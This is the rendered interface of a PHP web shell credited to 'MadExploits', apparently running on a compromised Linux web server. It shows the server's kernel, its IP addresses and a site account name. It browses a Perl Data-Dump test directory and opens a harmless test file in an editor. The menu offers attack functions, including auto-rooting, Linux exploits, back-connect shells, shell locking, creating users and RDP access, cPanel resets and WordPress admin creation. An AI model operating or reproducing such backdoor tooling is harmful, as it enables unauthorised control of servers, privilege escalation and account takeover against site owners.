Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.129.194.30
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Data-Dump-1.22 /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
dd.t
143
B
-rw-r--r--
dollar-one.t
299
B
-rw-r--r--
dump.t
2.1
KB
-rw-r--r--
eval.t
336
B
-rw-r--r--
filtered.t
1.7
KB
-rw-r--r--
glob.t
717
B
-rw-r--r--
hash.t
844
B
-rw-r--r--
quote-unicode.t
1.53
KB
-rw-r--r--
quote.t
2.05
KB
-rw-r--r--
ref.t
368
B
-rw-r--r--
regexp.t
553
B
-rw-r--r--
scalar-obj.t
421
B
-rw-r--r--
scalar.t
549
B
-rw-r--r--
tied.t
972
B
-rw-r--r--
vstring.t
510
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vstring.t
#!/usr/bin/perl -w BEGIN { if ($] < 5.010) { print "1..0 # Skipped: perl-5.10 required\n"; exit; } } use strict; use Test; plan tests => 9; use Data::Dump 'dump'; ok(dump(v10), q{v10}); ok(dump(v5.10.1), q{v5.10.1}); ok(dump(5.10.1), q{v5.10.1}); ok(dump(500.400.300.200.100), q{v500.400.300.200.100}); ok(dump(\5.10.1), q{\v5.10.1}); ok(dump(\v10), q{\v10}); ok(dump(\\v10), q{\\\\v10}); ok(dump([v10, v20, v30]), q{[v10, v20, v30]}); ok(dump({ version => v6.0.0 }), q({ version => v6.0.0 }));
Close